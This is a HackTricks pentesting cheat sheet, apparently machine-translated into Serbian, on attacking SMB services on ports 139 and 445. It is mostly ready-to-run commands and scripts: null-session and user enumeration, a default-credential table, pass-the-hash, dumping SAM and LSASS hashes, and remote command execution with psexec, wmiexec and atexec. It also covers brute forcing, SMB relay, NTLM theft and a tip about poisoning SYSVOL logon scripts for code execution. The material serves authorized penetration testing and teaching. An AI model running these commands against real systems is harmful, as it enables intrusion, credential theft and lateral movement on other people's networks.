HackTricks139,445 - Pentesting SMB
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Port 139
Network Basic Input Output System** (NetBIOS)** je softverski protokol dizajniran da omogući aplikacijama, računarima i desktop uređajima unutar lokalne mreže (LAN) da komuniciraju sa mrežnim hardverom i olakšaju prenos podataka kroz mrežu. Identifikacija i lociranje softverskih aplikacija koje rade na NetBIOS mreži postiže se preko njihovih NetBIOS imena, koja mogu imati do 16 karaktera i često se razlikuju od imena računara. NetBIOS sesija između dve aplikacije se inicira kada jedna aplikacija (koja deluje kao klijent) pošalje komandu da “call” drugu aplikaciju (koja deluje kao server) koristeći TCP Port 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Tehnički, Port 139 se naziva ‘NBT over IP’, dok se Port 445 označava kao ‘SMB over IP’. Akronim SMB označava ‘Server Message Blocks’, što je modernije poznato kao Common Internet File System (CIFS). Kao mrežni protokol na aplikativnom sloju, SMB/CIFS se prvenstveno koristi za omogućavanje zajedničkog pristupa fajlovima, štampačima, serijskim portovima i za olakšavanje različitih oblika komunikacije između čvorova na mreži.
Na primer, u kontekstu Windows, ističe se da SMB može raditi direktno preko TCP/IP, eliminišući potrebu za NetBIOS over TCP/IP, korišćenjem porta 445. Suprotno tome, na drugim sistemima primećuje se upotreba porta 139, što ukazuje da se SMB izvršava zajedno sa NetBIOS over TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Protokol Server Message Block (SMB), koji radi po client-server modelu, namenjen je regulisanju pristupa fajlovima, direktorijumima i drugim mrežnim resursima poput štampača i rutera. Pretežno se koristi unutar operativnog sistema Windows, SMB obezbeđuje kompatibilnost unazad, omogućavajući uređajima sa novijim verzijama Microsoftovog operativnog sistema da neprimetno komuniciraju sa onima koji koriste starije verzije. Pored toga, projekat Samba nudi rešenje slobodnog softvera koje omogućava implementaciju SMB-a na sistemima Linux i Unix, čime se olakšava međupatformska komunikacija preko SMB-a.
Shares, koji predstavljaju arbitrarne delove lokalnog fajl sistema, mogu biti ponuđeni od strane SMB servera, čineći hijerarhiju vidljivom klijentu delimično nezavisno od stvarne strukture servera. Access Control Lists (ACLs), koje definišu prava pristupa, omogućavaju fino podešavanje kontrole nad korisničkim privilegijama, uključujući atribute poput execute, read, i full access. Ova prava mogu biti dodeljena pojedinačnim korisnicima ili grupama, na osnovu share-ova, i razlikuju se od lokalnih dozvola postavljenih na serveru.
IPC$ Share
Pristup IPC$ share-u može se dobiti putem anonimne null sesije, što omogućava interakciju sa servisima izloženim putem named pipes. Alat enum4linux je koristan u tu svrhu. Ako se koristi pravilno, omogućava prikupljanje:
- Informacija o operativnom sistemu
- Detalja o nadređenom domenu
- Spiska lokalnih korisnika i grupa
- Informacija o dostupnim SMB shares
- Efektivne bezbednosne politike sistema
Ova funkcionalnost je ključna za mrežne administratore i bezbednosne profesionalce pri proceni bezbednosnog stanja SMB (Server Message Block) servisa na mreži. enum4linux pruža sveobuhvatan pregled SMB okruženja ciljnog sistema, što je suštinski važno za identifikovanje potencijalnih ranjivosti i osiguravanje da su SMB servisi pravilno zaštićeni.
enum4linux -a target_ip
Gornja komanda je primer kako se enum4linux može koristiti za izvođenje potpune enumeracije protiv cilja navedenog kao target_ip.
Šta je NTLM
Ako ne znate šta je NTLM ili želite da saznate kako funkcioniše i kako ga možete zloupotrebiti, vrlo će vam biti zanimljiva ova stranica o NTLM na kojoj je objašnjeno kako ovaj protokol funkcioniše i kako ga možete iskoristiti:
Enumeracija servera
Scan mreže u potrazi za hostovima:
nbtscan -r 192.168.0.1/24
Verzija SMB servera
Da biste tražili moguće exploits za SMB verziju, važno je znati koja verzija se koristi. Ako se ova informacija ne pojavljuje u drugim korišćenim alatima, možete:
- Koristite MSF auxiliary module
**auxiliary/scanner/smb/smb_version** - Ili ovaj skript:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
Pretraga exploit
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Mogući podaci za prijavu
| Korisničko ime(i) | Uobičajene lozinke |
|---|---|
| (blank) | (blank) |
| guest | (blank) |
| Administrator, admin | (blank), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
Brute Force
Informacije o SMB okruženju
Dobijanje informacija
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Enumeriši korisnike, grupe i prijavljene korisnike
Ove informacije bi već trebalo da su prikupljene iz enum4linux i enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Nabrajanje lokalnih korisnika
lookupsid.py -no-pass hostname.local
Oneliner
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Enumeracija lokalnih korisnika
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Enumeracija LSARPC i SAMR rpcclient
GUI konekcija iz Linuxa
U terminalu:
xdg-open smb://cascade.htb/
U prozoru file browsera (nautilus, thunar, etc)
smb://friendzone.htb/general/
Enumeracija deljenih foldera
Lista deljenih foldera
Uvek se preporučuje da proverite da li možete pristupiti bilo čemu; ako nemate credentials pokušajte koristiti null credentials/guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Poveži/Prikaži deljeni direktorijum
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Ručno izlistajte Windows share-ove i povežite se na njih
Moguće je da vam je onemogućeno pregledanje share-ova na host mašini i kada pokušate da ih navedete deluje kao da nema share-ova za povezivanje. Zato vredi pokušati kratko manualno povezivanje na share. Pri ručnoj enumeraciji share-ova obratite pažnju na odgovore kao što su NT_STATUS_ACCESS_DENIED i NT_STATUS_BAD_NETWORK_NAME, kada koristite važeću sesiju (npr. null session ili valid credentials). Ovo može ukazati da li share postoji ali nemate pristup ili da share uopšte ne postoji.
Uobičajena imena share-ova za Windows ciljeve su
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Uobičajena imena share-ova iz Network Security Assessment 3rd edition)
Pokušajte da se povežete na njih koristeći sledeću komandu
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
ili ova skripta (koristeći null session)
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
primeri
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Enumerisanje deljenih resursa sa Windows-a / bez alata trećih strana
PowerShell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
CMD konzola
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (grafički)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (grafički), unesite \\<ip>\ da vidite dostupne ne-skrivene deljene foldere.
Montiranje deljene fascikle
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Preuzimanje datoteka
Pročitajte prethodne sekcije da biste naučili kako da se povežete koristeći credentials/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Komande:
- mask: određuje masku koja se koristi za filtriranje fajlova u direktorijumu (npr. “” za sve fajlove)
- recurse: uključuje rekurziju (podrazumevano: isključeno)
- prompt: isključuje prompt za imena fajlova (podrazumevano: uključeno)
- mget: kopira sve fajlove koji odgovaraju maski sa hosta na klijentsku mašinu
(Informacije iz man stranice smbclient)
Pretraga deljenih foldera domena
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec spider.
-M spider_plus [--share <share_name>]--pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Posebno interesantne u share-ovima su datoteke nazvane Registry.xml, jer one mogu sadržavati lozinke za korisnike konfigurisane sa autologon putem Group Policy. Takođe, web.config datoteke često sadrže kredencijale.
Tip
The SYSVOL share is čitljiv za sve autentifikovane korisnike u domenu. Tamo možete naći različite batch, VBScript i PowerShell skripte. Proverite skripte u njemu jer biste mogli naći osetljive informacije poput lozinki. Takođe, ne verujte automatizovanim listingima share-ova: čak i ako share deluje samo za čitanje, podložni NTFS ACLs mogu dozvoljavati upis. Uvek testirajte sa smbclient tako što ćete otpremiti mali fajl na
\\<dc>\\SYSVOL\\<domain>\\scripts\\. Ako je moguće pisanje, možete poison logon scripts for RCE at user logon.
ShareHound – OpenGraph collector for SMB shares (BloodHound)
ShareHound otkriva SMB share-ove u domenu, pretražuje ih, izvlači ACLs i generiše OpenGraph JSON fajl za BloodHound CE/Enterprise.
- Osnovno prikupljanje:
- LDAP: enumeriše računarske objekte, pročitaj
dNSHostName - DNS: razreši svaki host
- SMB: listaj share-ove na dohvatljivim hostovima
- Prolazak kroz share-ove (BFS/DFS), enumeriši fajlove/foldere, zabeleži permisije
ShareQL-driven traversal
- ShareQL je DSL koji primenjuje pravilo first-match-wins da dozvoli/oduzme pretragu po host/share/path i postavi po-pravilu max depth. Fokusirajte se na interesantne share-ove i ograničite rekurziju.
Example ShareQL rules
# Only crawl shares with name containing "backup", up to depth 2
allow host * share * path * depth 0
allow host * share *backup* path * depth 2
deny host * share * path *
Korišćenje
sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" -ns "10.0.100.201" \
-rf "rules/skip_common_shares.shareql" -rf "rules/max_depth_2.shareql"
- Obezbedite AD creds putem
-ad/-au/-ap(ili koristite-adsa-au/-ap). Koristite-r/-rfza inline pravila ili fajlove. - Izlaz: JSON OpenGraph; importujte u BloodHound da biste pretraživali hostove/šerove/fajlove i proverili efektivna prava.
- Savet: Ograničite maksimalnu dubinu na 1–2 osim ako vaši filteri nisu veoma restriktivni.
BloodHound attack-surface queries
- Principals sa write-like pristupom na shares
MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty|CanDsWriteExtendedProperties]->(s:NetworkShareSMB)
RETURN x
- Principals sa FULL_CONTROL nad shares
Cypher: principals sa FULL_CONTROL nad shares
```cypher MATCH (p:Principal)-[r]->(s:NetworkShareSMB) WHERE (p)-[:CanDelete]->(s) AND (p)-[:CanDsControlAccess]->(s) AND (p)-[:CanDsCreateChild]->(s) AND (p)-[:CanDsDeleteChild]->(s) AND (p)-[:CanDsDeleteTree]->(s) AND (p)-[:CanDsListContents]->(s) AND (p)-[:CanDsListObject]->(s) AND (p)-[:CanDsReadProperty]->(s) AND (p)-[:CanDsWriteExtendedProperties]->(s) AND (p)-[:CanDsWriteProperty]->(s) AND (p)-[:CanReadControl]->(s) AND (p)-[:CanWriteDacl]->(s) AND (p)-[:CanWriteOwner]->(s) RETURN p,r,s ```- Pretražite osetljive fajlove po ekstenziji (npr. VMDKs)
MATCH p=(h:NetworkShareHost)-[:HasNetworkShare]->(s:NetworkShareSMB)-[:Contains*0..]->(f:File)
WHERE toLower(f.extension) = toLower(".vmdk")
RETURN p
Čitanje registra
Možda ćete moći da pročitate registar koristeći neke otkrivene kredencijale. Impacket reg.py omogućava да pokušате:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Post-eksploatacija
The default config of a Samba server is usually located in /etc/samba/smb.conf and might have some dangerous configs:
| Podešavanje | Opis |
|---|---|
browseable = yes | Dozvoljava listanje dostupnih deljenih resursa? |
read only = no | Zabranjuje kreiranje i izmenu fajlova? |
writable = yes | Dozvoljava korisnicima kreiranje i izmenu fajlova? |
guest ok = yes | Dozvoljava povezivanje na servis bez korišćenja lozinke? |
enable privileges = yes | Poštuje privilegije dodeljene specifičnom SID-u? |
create mask = 0777 | Koja prava treba dodeliti novokreiranim fajlovima? |
directory mask = 0777 | Koja prava treba dodeliti novokreiranim direktorijumima? |
logon script = script.sh | Koji skript treba da se izvrši pri prijavi korisnika? |
magic script = script.sh | Koji skript treba da se izvrši kada se skript zatvori? |
magic output = script.out | Gde treba sačuvati izlaz magic skripta? |
The command smbstatus gives information about the server and about who is connected.
Autentifikacija koristeći Kerberos
Možete se autentifikovati na kerberos koristeći alate smbclient i rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
U okruženjima koja koriste samo Kerberos (NTLM onemogućen), pokušaji NTLM prema SMB mogu vratiti STATUS_NOT_SUPPORTED. Otklonite uobičajene Kerberos probleme i prisilite Kerberos auth:
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
Za kompletno podešavanje klijenta (generisanje krb5.conf, kinit, SSH GSSAPI/SPN napomene) pogledajte:
88tcp/udp - Pentesting Kerberos
Izvršavanje komandi
crackmapexec
crackmapexec može izvršavati komande abusing bilo kojim od mmcexec, smbexec, atexec, wmiexec pri čemu je wmiexec podrazumevana metoda. Možete naznačiti koju opciju želite koristiti parametrom --exec-method:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
Obe opcije će napraviti novu uslugu (koristeći \pipe\svcctl via SMB) na mašini žrtve i iskoristiti je da izvrše nešto (psexec će upload izvršni fajl na ADMIN$ share i smbexec će pokazati na cmd.exe/powershell.exe i staviti u argumente payload –file-less technique--).
Više informacija o psexec i smbexec.
U kali se nalazi na /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Korišćenjem parametra-k možete se autentifikovati pomoću kerberos umesto NTLM
wmiexec/dcomexec
Diskretno pokrenite command shell bez zapisivanja na disk ili pokretanja novog servisa koristeći DCOM preko port 135.
Na kali se nalazi na /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Koristeći parametar-k možete se autentifikovati preko kerberos umesto NTLM
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Izvršava komande preko Task Scheduler-a (koristeći \pipe\atsvc preko SMB).
Na kali se nalazi na /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Impacket referenca
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
ksmbd attack surface i SMB2/SMB3 protokol fuzzing (syzkaller)
Ksmbd Attack Surface And Fuzzing Syzkaller
Bruteforce users credentials
Ovo se ne preporučuje, možete zaključati nalog ako pređete maksimalan dozvoljen broj pokušaja
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
Ovaj napad koristi Responder toolkit da bi presreo SMB autentifikacione sesije na unutrašnjoj mreži i prosledio ih na target machine. Ako je autentifikaciona sesija uspešna, automatski će vas ubaciti u system shell.
More information about this attack here.
SMB-Trap
Windows biblioteka URLMon.dll automatski pokušava da se autentifikuje prema hostu kada stranica pokuša da pristupi nekom sadržaju preko SMB, na primer: img src="\\10.10.10.10\path\image.jpg"
Ovo se dešava kod sledećih funkcija:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Koje koriste neki pregledači i alati (like Skype)
.png)
SMBTrap using MitMf
.png)
NTLM Theft
Slično SMB Trapping-u, postavljanje malicioznih fajlova na ciljnu mašinu (npr. preko SMB) može izazvati pokušaj SMB autentifikacije, što omogućava da se NetNTLMv2 hash presretne alatkom kao što je Responder. Ovaj hash se potom može razbiti offline ili iskoristiti u SMB relay attack.
HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
Reference
- NetExec (CME) wiki – korišćenje Kerberosa
- Pentesting Kerberos (88) – podešavanje klijenta i rešavanje problema
- ShareHound (collector)
- ShareQL (DSL)
Tip
Učite i vežbajte AWS Hacking:
Učite i vežbajte GCP Hacking:Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.